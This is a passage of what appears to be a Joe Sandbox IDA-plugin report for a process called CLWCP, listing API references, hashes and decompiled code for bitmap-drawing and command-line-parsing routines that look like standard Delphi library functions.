                                  0x004226a6
                                  0x004226ba
                                  0x004226ba
                                  0x004226cc
                                  0x004226d1
                                  0x004226d3
                                  0x004226d5
                                  0x004226d9
                                  0x004226da
                                  0x004226e2
                                  0x004226e3
                                  0x004226e8
                                  0x004226ea
                                  0x004226ee
                                  0x004226ef
                                  0x004226f7
                                  0x004226f8
                                  0x004226f8
                                  0x00422702
                                  0x00422709
                                  0x0042270e
                                  0x00422710
                                  0x00422715
                                  0x00422719
                                  0x0042271d
                                  0x0042271e
                                  0x00422720
                                  0x00422725
                                  0x00422726
                                  0x00422730
                                  0x00422739
                                  0x00422743
                                  0x00422743
                                  0x0042274c
                                  0x0042274f
                                  0x0042274f
                                  0x00422756
                                  0x00422759
                                  0x0042275c
                                  0x0042276a
                                  0x0042265f
                                  0x00422671
                                  0x00422776
                                  0x00422780
                                  0x00422780
                                  0x00000000
                                  0x00422776
                                  0x0042265d
                                  0x00422641

                                  APIs
                                  • GetObjectA.GDI32(00000000,00000054,?), ref: 004225DB
                                  • 72E7AC50.USER32(00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 00422609
                                  • 72E7A590.GDI32(?,00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 0042261A
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 00422635
                                  • SelectObject.GDI32(?,00000000), ref: 0042264F
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00422671
                                  • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,004227B3,?,00000000,00000054,?), ref: 0042267F
                                  • SelectObject.GDI32(00000000,00000000), ref: 004226C7
                                  • 72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 004226DA
                                  • 72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000,?,?,00000001,00000001), ref: 004226E3
                                  • 72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000,?), ref: 004226EF
                                  • 72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0042276B,?,?,?,00000000), ref: 004226F8
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00422702
                                  • 72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,0042276B), ref: 00422726
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00422730
                                  • SelectObject.GDI32(00000000,00000000), ref: 00422743
                                  • DeleteObject.GDI32(00000000), ref: 0042274F
                                  • DeleteDC.GDI32(00000000), ref: 00422765
                                  • SelectObject.GDI32(?,00000000), ref: 00422780
                                  • DeleteDC.GDI32(00000000), ref: 0042279C
                                  • 72E7B380.USER32(00000000,00000000,004227BA,00000001,00000000,?,00000000,00000000,004227B3,?,00000000,00000054,?,00000000,?,?), ref: 004227AD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                  • String ID:
                                  • API String ID: 4241548881-0
                                  • Opcode ID: 92b5d8956d827b566ecfb04ccea26f3f4d4d960e5afe805c8eae20835c3f9da9
                                  • Instruction ID: b1cbbc3a67424befefb4366d0554ae0d072720e7e2e4580c0d3ed9bb77c0ca3c
                                  • Opcode Fuzzy Hash: 92b5d8956d827b566ecfb04ccea26f3f4d4d960e5afe805c8eae20835c3f9da9
                                  • Instruction Fuzzy Hash: 7F513E71F04218BFDB10EBE9DC45FAEB7FCAB08704F51446AB614E7282D6B99940CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004234B0, Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 349COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E004234B0(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				signed short _v66;
				signed short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t159;
				intOrPtr _t162;
				void* _t165;
				void* _t173;
				void* _t182;
				intOrPtr _t188;
				struct HDC__* _t189;
				struct HDC__* _t203;
				signed int _t207;
				signed int _t213;
				intOrPtr _t240;
				intOrPtr* _t244;
				intOrPtr _t250;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E004026E4(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x4239cb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x42399e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403368(1);
						if(_a4 == 0) {
							E00402D4C( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E00415DE0(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t250 = _v64;
					E00402D4C(_t250, 0x28);
					_t240 = _t250;
					 *(_t240 + 4) = _v72 & 0x0000ffff;
					 *(_t240 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t240 + 0xc)) = _v68 & 0x0000ffff;
					 *((short*)(_t240 + 0xe)) = _v66 & 0x0000ffff;
					_t320 = _t319 - 0xc;
				}
				_t244 = _v64;
				 *_t244 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t244 + 0xc)) != 1) {
					E0041EBB4();
				}
				if(_v36 == 0x28) {
					_t213 =  *(_t244 + 0xe) & 0x0000ffff;
					if(_t213 == 0x10 || _t213 == 0x20) {
						if( *((intOrPtr*)(_t244 + 0x10)) == 3) {
							E00415D70(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t244 + 0x20) == 0) {
					 *(_t244 + 0x20) = E0041EE44( *(_t244 + 0xe) & 0x0000ffff);
				}
				_t317 = _v37 & 0x000000ff;
				_t79 = _t317 + 0x46e6e4; // 0xc08b0304
				E00415D70(_v12,  *(_t244 + 0x20) * ( *_t79 & 0x000000ff), _v32);
				_t83 = _t317 + 0x46e6e4; // 0xc08b0304
				_t321 = _t320 -  *(_t244 + 0x20) * ( *_t83 & 0x000000ff);
				if( *(_t244 + 0x14) == 0) {
					_t297 =  *(_t244 + 0xe) & 0x0000ffff;
					_t207 = E0041EE64( *((intOrPtr*)(_t244 + 4)), 0x20, _t297);
					asm("cdq");
					 *(_t244 + 0x14) = _t207 * (( *(_t244 + 8) ^ _t297) - _t297);
				}
				_t159 =  *(_t244 + 0x14);
				if(_t321 > _t159) {
					_t321 = _t159;
				}
				if(_v37 != 0) {
					_t159 = E0041F120(_v32);
				}
				_push(0);
				L004066E4();
				_v16 = E0041ECD4(_t159);
				_push(_t323);
				_push(0x423919);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t162 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t162 == 0 || _t162 == 3) {
					if( *0x46e454 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t165 = _v16;
						_push(_t165);
						L0040637C();
						_v44 = _t165;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040CAFC();
							} else {
								E0041EBB4();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E00415D70(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x4238e8;
						 *[fs:eax] = _t290;
						_push(0x423920);
						_t173 = _v16;
						_push(_t173);
						_push(0);
						L00406944();
						return _t173;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E004026E4(_t321);
					_push(_t323);
					_push(0x423881);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					E00415D70(_v12, _t321, _v24);
					_push(_v16);
					L00406374();
					_v20 = E0041ECD4(_v16);
					_push(1);
					_push(1);
					_t182 = _v16;
					_push(_t182);
					L0040636C();
					_v48 = SelectObject(_v20, _t182);
					_v56 = 0;
					_t187 =  *((intOrPtr*)(_v64 + 0x20));
					if( *((intOrPtr*)(_v64 + 0x20)) > 0) {
						_v52 = E0041F3DC(0, _t187);
						_push(0);
						_push(_v52);
						_t203 = _v20;
						_push(_t203);
						L004064E4();
						_v56 = _t203;
						_push(_v20);
						L004064B4();
					}
					_push(_t323);
					_push(0x423855);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t188 = _v28;
					_push(_t188);
					_push(_v24);
					_push(4);
					_push(_t188);
					_t189 = _v20;
					_push(_t189);
					L00406384();
					_v44 = _t189;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040CAFC();
						} else {
							E0041EBB4();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42385c);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L004064E4();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}



















































                                  0x004234b0
                                  0x004234b1
                                  0x004234b3
                                  0x004234bc
                                  0x004234be
                                  0x004234c1
                                  0x004234c6
                                  0x004234cb
                                  0x004234d0
                                  0x004234e0
                                  0x004234e7
                                  0x004234ef
                                  0x004234f1
                                  0x004234f1
                                  0x00423508
                                  0x0042350e
                                  0x00423513
                                  0x00423514
                                  0x00423519
                                  0x0042351c
                                  0x00423521
                                  0x00423522
                                  0x00423527
                                  0x0042352a
                                  0x00423531
                                  0x00423590
                                  0x00423593
                                  0x00423599
                                  0x0042359f
                                  0x004235b9
                                  0x004235c0
                                  0x004235cf
                                  0x004235d4
                                  0x004235e2
                                  0x004235ee
                                  0x004235ee
                                  0x004235fe
                                  0x0042360e
                                  0x00423622
                                  0x00423631
                                  0x00423643
                                  0x00423649
                                  0x00423649
                                  0x00423533
                                  0x00423543
                                  0x00423546
                                  0x00423552
                                  0x00423557
                                  0x0042355d
                                  0x00423564
                                  0x0042356b
                                  0x00423573
                                  0x00423577
                                  0x00423577
                                  0x0042364c
                                  0x00423652
                                  0x0042365a
                                  0x00423662
                                  0x00423664
                                  0x00423664
                                  0x0042366d
                                  0x0042366f
                                  0x00423677
                                  0x00423683
                                  0x00423690
                                  0x00423695
                                  0x00423699
                                  0x00423699
                                  0x00423683
                                  0x00423677
                                  0x004236a0
                                  0x004236ab
                                  0x004236ab
                                  0x004236b1
                                  0x004236b5
                                  0x004236c5
                                  0x004236cd
                                  0x004236d6
                                  0x004236dc
                                  0x004236de
                                  0x004236ea
                                  0x004236f4
                                  0x004236fc
                                  0x004236fc
                                  0x004236ff
                                  0x00423704
                                  0x00423706
                                  0x00423706
                                  0x0042370c
                                  0x00423711
                                  0x00423711
                                  0x00423716
                                  0x00423718
                                  0x00423722
                                  0x00423727
                                  0x00423728
                                  0x0042372d
                                  0x00423730
                                  0x00423736
                                  0x0042373b
                                  0x00423749
                                  0x00423888
                                  0x0042388a
                                  0x0042388f
                                  0x00423890
                                  0x00423895
                                  0x00423896
                                  0x00423899
                                  0x0042389a
                                  0x0042389f
                                  0x004238a6
                                  0x004238b5
                                  0x004238be
                                  0x004238b7
                                  0x004238b7
                                  0x004238b7
                                  0x004238b5
                                  0x004238c5
                                  0x004238cb
                                  0x004238ce
                                  0x004238d9
                                  0x004238e0
                                  0x004238e3
                                  0x00423902
                                  0x00423905
                                  0x00423908
                                  0x0042390d
                                  0x00423910
                                  0x00423911
                                  0x00423913
                                  0x00423918
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042374f
                                  0x0042374f
                                  0x00423751
                                  0x0042375b
                                  0x00423760
                                  0x00423761
                                  0x00423766
                                  0x00423769
                                  0x00423774
                                  0x0042377c
                                  0x0042377d
                                  0x00423787
                                  0x0042378a
                                  0x0042378c
                                  0x0042378e
                                  0x00423791
                                  0x00423792
                                  0x004237a1
                                  0x004237a6
                                  0x004237ac
                                  0x004237b1
                                  0x004237bf
                                  0x004237c2
                                  0x004237c7
                                  0x004237c8
                                  0x004237cb
                                  0x004237cc
                                  0x004237d1
                                  0x004237d7
                                  0x004237d8
                                  0x004237d8
                                  0x004237df
                                  0x004237e0
                                  0x004237e5
                                  0x004237e8
                                  0x004237eb
                                  0x004237ed
                                  0x004237f0
                                  0x004237f4
                                  0x004237f5
                                  0x004237f7
                                  0x004237f8
                                  0x004237fb
                                  0x004237fc
                                  0x00423801
                                  0x00423808
                                  0x00423811
                                  0x0042381a
                                  0x00423813
                                  0x00423813
                                  0x00423813
                                  0x00423811
                                  0x00423821
                                  0x00423824
                                  0x00423827
                                  0x00423830
                                  0x00423832
                                  0x00423837
                                  0x0042383b
                                  0x0042383c
                                  0x0042383c
                                  0x00423854
                                  0x00423854

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,00000000,004239CB,?,?), ref: 00423718
                                  • 72E7A590.GDI32(00000001,00000000,00423881,?,00000000,00423919,?,00000000,?,00000000,004239CB,?,?), ref: 0042377D
                                  • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00423881,?,00000000,00423919,?,00000000,?,00000000,004239CB,?,?), ref: 00423792
                                  • SelectObject.GDI32(?,00000000), ref: 0042379C
                                  • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00423881,?,00000000,00423919,?,00000000), ref: 004237CC
                                  • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00423881,?,00000000,00423919), ref: 004237D8
                                  • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00423855,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004237FC
                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00423855,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042380A
                                  • 72E7B410.GDI32(?,00000000,000000FF,0042385C,00000000,?,00000000,00000000,00423855,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042383C
                                  • SelectObject.GDI32(?,?), ref: 00423849
                                  • DeleteObject.GDI32(00000000), ref: 0042384F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                  • String ID: ($BM
                                  • API String ID: 3415089252-2980357723
                                  • Opcode ID: 3038c8f3ed29e90559444b9e70a542dcf44815427a0d9b871c76df7af2bb2eb3
                                  • Instruction ID: e27723dd7574d1b027bccd993f69f9d76657a104af5ac3901e2869f95fea7946
                                  • Opcode Fuzzy Hash: 3038c8f3ed29e90559444b9e70a542dcf44815427a0d9b871c76df7af2bb2eb3
                                  • Instruction Fuzzy Hash: 7FD15F74A002189FDF14DFA9D885AAEBBF5FF48304F40846AF905AB391D73C9941CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004029D0, Relevance: 27.1, APIs: 9, Strings: 9, Instructions: 110COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004029D0(CHAR* __eax, void* __ecx, intOrPtr* __edx) {
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t29;
				CHAR* _t30;
				CHAR* _t31;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t36;
				CHAR** _t37;

				_t33 = __edx;
				_t23 = __eax;
				L2:
				while(1) {
					if( *_t23 != 0 &&  *_t23 <= 0x20) {
						_t23 = CharNextA(_t23);
						continue;
					}
					if( *_t23 != 0x22 || _t23[1] != 0x22) {
						_t35 = 0;
						 *_t37 = _t23;
						while( *_t23 > 0x20) {
							if( *_t23 != 0x22) {
								_t29 = CharNextA(_t23);
								_t35 = _t35 + _t29 - _t23;
								_t23 = _t29;
								continue;
							}
							_t23 = CharNextA(_t23);
							while( *_t23 != 0 &&  *_t23 != 0x22) {
								_t32 = CharNextA(_t23);
								_t35 = _t35 + _t32 - _t23;
								_t23 = _t32;
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						E00404768(_t33, _t35);
						_t24 =  *_t37;
						_t36 =  *_t33;
						_t34 = 0;
						while( *_t24 > 0x20) {
							if( *_t24 != 0x22) {
								_t30 = CharNextA(_t24);
								if(_t30 <= _t24) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t30 > _t24);
								continue;
							}
							_t24 = CharNextA(_t24);
							while( *_t24 != 0 &&  *_t24 != 0x22) {
								_t31 = CharNextA(_t24);
								if(_t31 <= _t24) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t31 > _t24);
							}
							if( *_t24 != 0) {
								_t24 = CharNextA(_t24);
							}
						}
						return _t24;
					} else {
						_t23 =  &(_t23[2]);
						continue;
					}
				}
			}














                                  0x004029d5
                                  0x004029d7
                                  0x00000000
                                  0x004029e3
                                  0x004029e6
                                  0x004029e1
                                  0x00000000
                                  0x004029e1
                                  0x004029f0
                                  0x004029fd
                                  0x004029ff
                                  0x00402a4c
                                  0x00402a07
                                  0x00402a42
                                  0x00402a48
                                  0x00402a4a
                                  0x00000000
                                  0x00402a4a
                                  0x00402a0f
                                  0x00402a23
                                  0x00402a19
                                  0x00402a1f
                                  0x00402a21
                                  0x00402a21
                                  0x00402a30
                                  0x00402a38
                                  0x00402a38
                                  0x00402a30
                                  0x00402a55
                                  0x00402a5a
                                  0x00402a5d
                                  0x00402a5f
                                  0x00402abd
                                  0x00402a66
                                  0x00402aaa
                                  0x00402aae
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402ab0
                                  0x00402ab0
                                  0x00402ab3
                                  0x00402ab7
                                  0x00402ab8
                                  0x00402ab9
                                  0x00000000
                                  0x00402ab0
                                  0x00402a6e
                                  0x00402a8b
                                  0x00402a78
                                  0x00402a7c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402a7e
                                  0x00402a7e
                                  0x00402a81
                                  0x00402a85
                                  0x00402a86
                                  0x00402a87
                                  0x00402a7e
                                  0x00402a98
                                  0x00402aa0
                                  0x00402aa0
                                  0x00402a98
                                  0x00402ac9
                                  0x004029f8
                                  0x004029f8
                                  0x00000000
                                  0x004029f8
                                  0x004029f0

                                  APIs
                                  • CharNextA.USER32(00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A0A
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A14
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A33
                                  • CharNextA.USER32(00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A3D
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A69
                                  • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A73
                                  • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A9B
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402AA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID: $ $ $"$"$"$"$"$"
                                  • API String ID: 3213498283-3597982963
                                  • Opcode ID: 0d0196756a8a4080e55c29058be7e4aba72a44c5f142b8481814641539d90697
                                  • Instruction ID: 44ec07a4bcdb557574acdaee91d33b08c8f1e99b3d8c415b53775f35736111de
                                  • Opcode Fuzzy Hash: 0d0196756a8a4080e55c29058be7e4aba72a44c5f142b8481814641539d90697
                                  • Instruction Fuzzy Hash: C33182957482D02AEB3366B58ECC32A39C54B9A354F1804FB9542BB3D7D9FC4841972E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00422AC8, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E00422AC8(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				E0041E9AC(_v8, __ecx,  *0x422d14 & 0x000000ff);
				E00423228(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L004064E4();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L004064B4();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L0040641C();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L0040641C();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E00422E54(_t164) == 0) {
						SetStretchBltMode(E0041E8D0(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x422d06);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E004231C8(_t164, _t165);
				}
				E0041E9AC(E00422D98(_t164), _t165,  *0x422d14 & 0x000000ff);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E00422D98(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x422d0d);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L004064E4();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x422c9b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L00406374();
					_v28 = E0041ECD4(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E0041EE84( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E00422D98(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
					_push(0x422ce0);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}


























                                  0x00422ac8
                                  0x00422ac9
                                  0x00422acb
                                  0x00422ad1
                                  0x00422ad3
                                  0x00422ad6
                                  0x00422ad8
                                  0x00422ae5
                                  0x00422aec
                                  0x00422af3
                                  0x00422af6
                                  0x00422afa
                                  0x00422aff
                                  0x00422b01
                                  0x00422b03
                                  0x00422b07
                                  0x00422b0a
                                  0x00422b0b
                                  0x00422b10
                                  0x00422b19
                                  0x00422b1a
                                  0x00422b1f
                                  0x00422b1f
                                  0x00422b23
                                  0x00422b28
                                  0x00422b2b
                                  0x00422b2c
                                  0x00422b31
                                  0x00422b32
                                  0x00422b37
                                  0x00422b3b
                                  0x00422b42
                                  0x00422b43
                                  0x00422b48
                                  0x00422b59
                                  0x00422b59
                                  0x00422b4a
                                  0x00422b4e
                                  0x00422b57
                                  0x00422b5d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00422b57
                                  0x00422b61
                                  0x00422ba4
                                  0x00422bb1
                                  0x00422bb1
                                  0x00422b63
                                  0x00422b6e
                                  0x00422b7c
                                  0x00422b94
                                  0x00422b94
                                  0x00422bb8
                                  0x00422bb9
                                  0x00422bbe
                                  0x00422bc1
                                  0x00422bcd
                                  0x00422bd1
                                  0x00422bd1
                                  0x00422be4
                                  0x00422bf2
                                  0x00422cdb
                                  0x00422ce2
                                  0x00422ce5
                                  0x00422ce8
                                  0x00422cf1
                                  0x00422cf3
                                  0x00422cf8
                                  0x00422cfc
                                  0x00422cff
                                  0x00422d00
                                  0x00000000
                                  0x00422d00
                                  0x00422d05
                                  0x00422bf8
                                  0x00422bfa
                                  0x00422bff
                                  0x00422c04
                                  0x00422c05
                                  0x00422c0a
                                  0x00422c0d
                                  0x00422c12
                                  0x00422c1c
                                  0x00422c2c
                                  0x00422c66
                                  0x00422c6b
                                  0x00422c6d
                                  0x00422c70
                                  0x00422c73
                                  0x00422c7c
                                  0x00422c86
                                  0x00422c86
                                  0x00422c8f
                                  0x00000000
                                  0x00422c95
                                  0x00422c9a
                                  0x00422c9a

                                  APIs
                                    • Part of subcall function 00423228: 72E7AC50.USER32(00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042327E
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 00423293
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042329D
